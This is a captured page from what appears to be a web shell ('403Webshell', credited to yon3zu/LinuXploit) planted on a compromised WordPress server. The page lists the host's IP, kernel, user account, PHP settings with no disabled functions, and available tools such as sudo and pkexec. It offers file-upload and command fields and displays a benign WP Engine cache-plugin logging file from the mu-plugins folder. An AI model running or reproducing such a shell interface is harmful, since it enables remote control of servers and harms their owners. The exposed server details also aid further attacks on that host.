403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/winee/wp-content/mu-plugins/wpe-cache-plugin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/winee/wp-content/mu-plugins/wpe-cache-plugin/logging-trait.php
<?php

declare(strict_types=1);
namespace wpengine\cache_plugin;

// phpcs:disable WordPress.PHP.DevelopmentFunctions

abstract class CachePluginLoggingTags {
	const WPE_CACHE_PLUGIN_INFO_LOG_TAG    = 'wpe_cache_plugin:info:';
	const WPE_CACHE_PLUGIN_ERROR_LOG_TAG   = 'wpe_cache_plugin:error:';
	const WPE_CACHE_PLUGIN_WARNING_LOG_TAG = 'wpe_cache_plugin:warning:';
}

trait CachePluginLoggingTrait {
	protected function log_info( $message ) {
		error_log( CachePluginLoggingTags::WPE_CACHE_PLUGIN_INFO_LOG_TAG . ' ' . $message );
	}

	protected function log_error( $message ) {
		error_log( CachePluginLoggingTags::WPE_CACHE_PLUGIN_ERROR_LOG_TAG . ' ' . $message );
	}

	protected static function log_warning_static( $message ) {
		error_log( CachePluginLoggingTags::WPE_CACHE_PLUGIN_WARNING_LOG_TAG . ' ' . $message );
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit